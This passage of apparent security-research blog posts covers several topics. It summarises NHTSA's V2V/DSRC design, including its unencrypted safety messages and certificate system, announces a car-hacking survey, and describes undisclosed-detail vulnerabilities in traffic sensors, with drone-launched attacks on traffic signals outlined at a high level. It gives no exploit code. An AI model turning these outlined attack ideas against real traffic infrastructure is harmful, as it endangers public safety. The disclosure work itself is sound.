Dedicated Short-range Communications (DSRC) – The short-range wireless communications that RSE and OBE use to communicate.
 
Driver Vehicle Interface (DVI) – This interface will display the V2V warnings.
Basic Safety Message (BSM) – This is a message sent to and received from other OBE and RSE devices to make the V2V system work. For example, it could announce the current speed of the vehicle.
 
Security Credentials Management System (SCMS) – The systems that manage all of the credentials for V2V systems, such as the certificates used to authenticate BSMs. 
 
 
Communications
 
The most interesting portion of the document for me was the technical information about the underlying communications system. I think many people want to understand what kind of wireless communications will be implemented for the vehicles and devices with which they will interact. 
 
The V2V infrastructure will operate on the 5.8 – 5.9 GHz band (5850 – 5925 MHz) using seven (7) non-overlapping 10 MHz channels, with a 5 MHz guard band at the beginning of each frequency range. Channel 172 will be used to send public safety information. 
 
Since these devices, much like your AM/FM radio, can only be on one channel at a time, switching is necessary. Switching between the Control Channel (CCH) and Service Channel (SCH) occurs every 50 ms to transmit or receive DSRC messages emitted by other vehicles or RSE. There is a 4 ms front guard leaving only 46 percent of “potentially” available bandwidth for BSM transmissions. 
 
DSRC messages will be broadcast (omnidirectional for up to 300 meters) on a standardized network (IEEE 1609.4) over a standardized wireless layer IEEE 802.11p. The chart below shows all of the system standards currently anticipated for the first generation V2V system.
 
 
 
 
 
 
 
 
 
 
 
 
BSM messages also have a certain format, which is partially listed below. Please see the original document for more detailed information. Each message should have a packet size of 200 – 500 bytes with a maximum required range of 50 – 300 meters. 
 

Note: This is a partial snippet of the BSM Part II contents.
 
One main take away was that BSM messages are NOT encrypted; therefore, they could be viewed over the air by interested parties. The messages are, however, authenticated via a signing mechanism (discussed in the next section). 
 
Notable Items:
 
NHSTA is unsure if current WiFi infrastructure will interfere with the communications based on the devices. The claim is that more research is required. 
 
NHSTA claims the system will NOT collect or store any data identifying individuals or individual vehicles, nor will it create the ability for the government to do so.
 
NHSTA claims it would be extremely difficult for third parties to use the system to track a vehicle.
 
“NHTSA is aware of concerns that the V2V system could broadcast or store BSM data (such as GPS or path history) that, if captured by a third party, might facilitate very-localized vehicle tracking. In fact, the broadcast of unencrypted GPS, path history, and other data characteristics in or derived from the BSM appears to introduce only very limited potential risks to individual privacy.”
“It is theoretically possible that a third party could try to capture the transitory locational data in order to track a specific vehicle. However, we do not see a scenario in which one wishing to track a vehicle would choose the V2V system as the means.”
 
“To date, NHTSA’s V2V research has not included research specific to this issue, as researchers assumed that the possibility of cyber-attacks on motor vehicles was an existing vector of risk – not a new one created by V2V technologies.”
 
My Thoughts:
 
This is an amazingly complex system that is going to send, receive, and analyze data in real-time.
 
It will be interesting to see if people figure out how to use BSM messages to track vehicles or enumerate personal information due to their lack of encryption.
It looks like you could use BSM messages to gather information and track a vehicle, but I’m unsure of the practicality of doing so.
 
I don’t really know enough about radio/wireless to comment much more, but I’d love to hear other people’s thoughts. 
 
Security
 
The V2V system, while sending a majority of the information in cleartext, does have mechanisms that are designed for security. After much internal debate, it was decided that a Public Key Infrastructure (PKI) would be implemented to prove authenticity when sending and receiving messages. I think we’re all familiar with the PKI system, since we use it every day on the Internet to do our banking, chatting, and general internetting. Because this is a blog post, I only sampled a small set of the information available in the document. Also, I’m far from a crypto expert and will do my best to briefly explain the system that is being implemented. Please excuse or correct any errors you see with a quick tweet to @nudehaberdasher.
 
As stated before, BSMs are NOT encrypted, but verified with a digital signature, meaning that each message must be signed before it is sent and checked upon receipt. This trust system is a requirement, since thousands of messages will be authenticated in real-time when driving a vehicle that uses the V2V system. 
 
Like our Internet PKI system, there is a Certificate Authority (CA) but, to quote the paper: 
“We note that the interactions between the components shown in Figure <not-shown> are all based on machine-to-machine performance. No human judgment is involved in creation, granting, or revocation of the digital certificates.”
 
This means that there will not be human involvement when putting new devices on the V2V system. 
 
A simplified version of the system can be seen below.
 
 
Obviously, the system is much more complex, involving preinstalled certificates, which are supposed to last five minutes each, a signing authority, and even a misbehavior authority responsible for revoking certificates for a variety of reasons. A comparison between the V2V PKI system and the PKI system we currently use on the Internet is illustrated below. 
 
“Initial deployment is assumed to last for three years, and requires that OBEs on newly manufactured vehicles download a three-year batch of certificates. These batches would include reusable, overlapping five-minute certificates valid for one week. The term “overlapping” in this context refers to the fact that any certificate can be used at any time during the validity period. The batches would be good for one week and at this point are assumed to be around 20 certificates per week, which equates to 1,040 for one year of certificates. As the frequency of the certificate download batch changes for full deployment, the number and therefore size of the certificate batches also changes accordingly.”
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
It looks as if there are two options for preinstalled certificates, which will be placed there by OEMs and aftermarket solution providers:
 
Option 1: Three-year reusable, non-overlapping five-minute certificates
 
Option 2: Three-year batches of reusable, overlapping, 260 five-minute certificates valid for one week
 
Certificates will be managed by the SCMS and communications with devices will go as follows: 
  • UPLOAD – a request for new certificates
  • DOWNLOAD – new certificates
  • UPLOAD – a misbehavior report
  • DOWNLOAD – a full/partial CRL
  • Conduct other data functions or system updates
Certificate renewal, updates, and revocation still seem to be up in the air. Certificate downloads could happen through cellular, WiFi, or DSRC. The most likely scenario will be DSRC due to cost and availability issues. New certificates could be updated in-full on a daily basis, or the system could use incremental updates to save time and bandwidth. 
 
While the design of the system seems to be pretty well developed, the details of the implementation and ownership still seem to be undecided. It looks like only time will tell who will own and administer this system and in what fashion it will be administered. 
 
Notable Items:
 
“As no decisions about ownership or operation have been made, we do not advocate for public or private ownership, but include the basic functions we expect the SCMS Manager would perform in our discussions and analyses.”
 
“Most SCMS functions listed above are fairly well developed. One critical function, which has not yet been fleshed out adequately for DOT to assess, is the Misbehavior Authority (MA) — the central function responsible for processing misbehavior reports generated by OBE and producing and publishing the CRL.”
 
“Global detection processes have not yet been defined.”
 
Research into the PKI system will continue into 2016. 
 
“Publication of the seed is sufficient to revoke all certificates belonging to the revoked device, but without the seed an eavesdropper cannot tell which certificates belong to a particular device. (Note: the revocation process is designed such that it does not give up backward privacy.)”
 
Internal Blacklist – This would be used by the SCMS to make sure that an OBE asking for new certificates is not on the revoked list. If a vehicle or device is on the list, no certificate updates will be issued.
 
My Thoughts:
 
Be it that devices with valid certificates and valid certificate updates will be the hands of an ‘attacker’, I’m interested to see how well the certificate revocation functionality works. 
 
Without any decision on certificate revocation, will it be implemented? If so, will it be done correctly and robustly? 
 
How fast can certificates be revoked? 
 
Sending spoofed, legitimately signed messages for even five minutes at a busy intersection could cause a massive disruption. 
 
Private keys are going to be in infrastructure devices, meaning there’s a good chance they won’t be ‘private’ for long. 
 
Crypto people do your crypto thing on this. 
 
Conclusion
 
I think the V2V technology is very interesting but still has many questions to answer, due to its massive technical complexity and huge economic cost. Additionally, I don’t think people have much to be worried about in the first iteration since there are only audible and visual warnings to the driver, without any direct effect on the vehicle. 
 
I hope that, when developing these systems, planning and design would be considered around vehicle control and not only warnings, as it seems like true V2V accident avoidance is the next logical step. Additionally, there is probably a good chance that current vehicle bus infrastructure is used to provide warnings to the driver, which means there is yet another remote entry point to the vehicle which potentially uses the vehicle’s network for communication. From an attacker’s perspective, all remote communication systems that interact with the car will be seen as attack surfaces. 
 
My last thought is that a true V2V infrastructure is further away than many people think. While we may have fringe devices in the coming years, full fleet adoption isn’t expected until 2037, so we can all go back to worrying about our robot overlords taking over in 2029. 
Chris Valasek @nudehaberdasher
 
Special Thanks: Charlie Miller (@0xcharlie) and Zach Lanier (@quine
RESEARCH | August 14, 2014

Remote survey paper (car hacking)

Good Afternoon Interwebs,
Chris Valasek here. You may remember me from such nature films as “Earwigs: Eww”.
Charlie and I are finally getting around to publicly releasing our remote survey paper. I thought this went without saying but, to reiterate, we did NOT physically look at the cars that we discussed. The survey was designed as a high level overview of the information that we acquired from the mechanic’s sites for each manufacturer. The ‘Hackability’ is based upon our previous experience with automobiles, attack surface, and network structure.
Enjoy!
RESEARCH | July 31, 2014

Hacking Washington DC traffic control systems

This is a short blog post, because I’ve talked about this topic in the past. I want to let people know that I have the honor of presenting at DEF CON on Friday, August 8, 2014, at 1:00 PM. My presentation is entitled “Hacking US (and UK, Australia, France, Etc.) Traffic Control Systems”. I hope to see you all there. I’m sure you will like the presentation.

I am frustrated with Sensys Networks (vulnerable devices vendor) lack of cooperation, but I realize that I should be thankful. This has prompted me to further my research and try different things, like performing passive onsite tests on real deployments in cities like Seattle, New York, and Washington DC. I’m not so sure these cities are equally as thankful, since they have to deal with thousands of installed vulnerable devices, which are currently being used for critical traffic control.

The latest Sensys Networks numbers indicate that approximately 200,000 sensor devices are deployed worldwide. See http://www.trafficsystemsinc.com/newsletter/spring2014.html. Based on a unit cost of approximately $500, approximately $100,000,000 of vulnerable equipment is buried in roads around the world that anyone can hack. I’m also concerned about how much it will cost tax payers to fix and replace the equipment.

One way I confirmed that Sensys Networks devices were vulnerable was by traveling to Washington DC to observe a large deployment that I got to know.

When I exited the train station, the fun began.

INSIGHTS | April 30, 2014

Hacking US (and UK, Australia, France, etc.) Traffic Control Systems

Probably many of you have watched scenes from “Live Free or Die Hard” (Die Hard 4) where “terrorist hackers” manipulate traffic signals by just hitting Enter or typing a few keys. I wanted to do that! I started to look around, and while I couldn’t exactly do the same thing (too Hollywood style!), I got pretty close. I found some interesting devices used by traffic control systems in important US cities, and I could hack them 🙂 These devices are also used in cities in the UK, France, Australia, China, etc., making them even more interesting.
After getting the devices, it wasn’t difficult to find vulnerabilities (actually, it was more difficult to make them work properly, but that’s another story).

The vulnerabilities I found allow anyone to take complete control of the devices and send fake data to traffic control systems. Basically anyone could cause a traffic mess by launching an attack with a simple exploit programmed on cheap hardware ($100 or less).
I even tested the attack launched from a drone flying at over 650 feet, and it worked! Theoretically, an attack could be launched from up to 1 or 2 miles away with a better drone and hardware equipment, I just used a common, commercially available drone and cheap hardware. Since it seems flying a drone in the US is not illegal and anyone will be able to get drones on demand soon, I would be worried about attacks from the sky in the US.
It might also be possible to create self-replicating malware (worm) that can infect these vulnerable devices in order to launch attacks affecting traffic control systems later. The exploited device could then be used to compromise all of the same devices nearby.
 
What worries me the most is that if a vulnerable device is compromised, it’s really, really difficult and really, really costly to detect it. So there could already be compromised devices out there that no one knows about or could know about. 
 
Let me give you an idea of how affected some cities are. The following is from documentation from vulnerable vendors:
  • 250+ customers in 45 US states and 10 countries
  • Important US cities have deployments: New York, Washington DC, San Francisco, Los Angeles, Boston, Seattle, etc.
  • 50,000+ devices deployed worldwide (most of them in the US)
  • Countries include US, United Kingdom, China, Canada, Australia, France, etc. For instance, some UK cities with deployments: London, Shropshire, Slough, Bournemouth, Aberdeen, Blackburn with Darwen Borough Council, Belfast, etc. 
  • Australia has a big deployment on one of the most important and modern freeways.


As you can see, there are 50,000+ devices out there that could be hacked and cause traffic messes in many important cities.

Going onsite
I knew that the devices I have are vulnerable, but I wanted to be 100% sure that I wasn’t missing anything with my tests. Real-life deployments could have different configurations (different hardware/software versions)  

and it seemed that the vendor provided wrong information when I reported the vulnerabilities, so maybe what I found didn’t affect real-life deployments. I put my “tools” in my backpack and went to Seattle, New York, and Washington DC to do some “passive” onsite tests (“no hacking and nothing illegal” :)). Luckily, I could confirm that what I found applied to real-life deployments. BTW, many thanks to Ian Amit for the pictures and videos and for daring to go with me to DC :).

Vulnerabilities
As you may have already realized, I’m not going to share specific nor technical details here (for that, you will have to wait and go to Infiltrate 2014 in a couple of weeks. What I would like to mention is that the vendor was contacted a long time ago (September 2013) through ICS-CERT (the initial report to ICS-CERT was sent on July 31st, 2013). I was told by ICS-CERT that the vendor said that they didn’t think the issues were critical nor even important. For instance, regarding one of the vulnerabilities, the vendor said that since the devices were designed that way (insecure) on purpose, they were working as designed, and that customers (state/city governments) wanted the devices to work that way (insecure), so there wasn’t any security issue. Yes that was the answer, I couldn’t believe it. 
 
Regarding another vulnerability, the vendor said that it’s already fixed on newer versions of the device. But there is a big problem, you need to get a new device and replace the old one. This is not good news for state/city governments, since thousands of devices are already out there, and the time and money it would take to replace all of them is considerable. Meanwhile, the existing devices are vulnerable and open to attack.
 
Another excuse the vendor provided is that because the devices don’t control traffic lights, there is no need for security. This is crazy, because while the devices don’t directly control traffic control systems, they have a direct influence on the actions and decisions of these systems.
I tried several times to make ICS-CERT and the vendor understand that these issues were serious, but I couldn’t convince them. In the end I said, if the vendor doesn’t think they are vulnerable then OK, I’m done with this; I have tried hard, and I don’t want to continue wasting time and effort. Also, since DHS is aware of this (through ICS-CERT), and it seems that this is not critical nor important to them, then there isn’t anything else I can do except to go public.
 
This should be another wake up call for governments to evaluate the security of devices/products before using them in critical infrastructure, and also a request to providers of government devices/products to take security and security vulnerability reports seriously.
 
Impact
 
By exploiting the vulnerabilities I found, an attacker could cause traffic jams and problems at intersections, freeways, highways, etc. 
Electronic signs
It’s possible to make traffic lights (depending on the configuration) stay green more or less time, stay red and not change to green (I bet many of you have experienced something like this as a result of driving during non-traffic hours late at night or being on a bike or in a small car), or flash. It’s also possible to cause electronic signs to display incorrect speed limits and instructions and to make ramp meters allow cars on the freeway faster or slower than needed. 
 
These traffic problems could cause real issues, even deadly ones, by causing accidents or blocking ambulances, fire fighters, or police cars going to an emergency call.
I’m sure there are manual overrides and secondary controls in place that can be used if anomalies are detected and could mitigate possible attacks, and some traffic control systems won’t depend only on these vulnerable devices. This doesn’t mean that attacks are impossible or really complex; the possibility of a real attack shouldn’t be disregarded, since launching an attack is simple. The only thing that could be complex is making an attack have a bigger impact, but complex doesn’t mean impossible.
 

Traffic departments in states/cities with vulnerable devices deployed should pay special attention to traffic anomalies when there is no apparent reason and closely watch the device’s behavior.
 
“In 2012, there were an estimated 5,615,000 police-reported traffic crashes in which 33,561 people were killed and 2,362,000 people were injured; 3,950,000 crashes resulted in property damage only.” US DoT National Highway Traffic Safety Administration: Traffic Safety Facts
 
“Road crashes cost the U.S. $230.6 billion per year, or an average of $820 per person” Association for Safe International Road Travel: Annual US Road Crash Statistics
 
If you add malfunctioning traffic control systems to the above stats, the numbers could be a lot worse.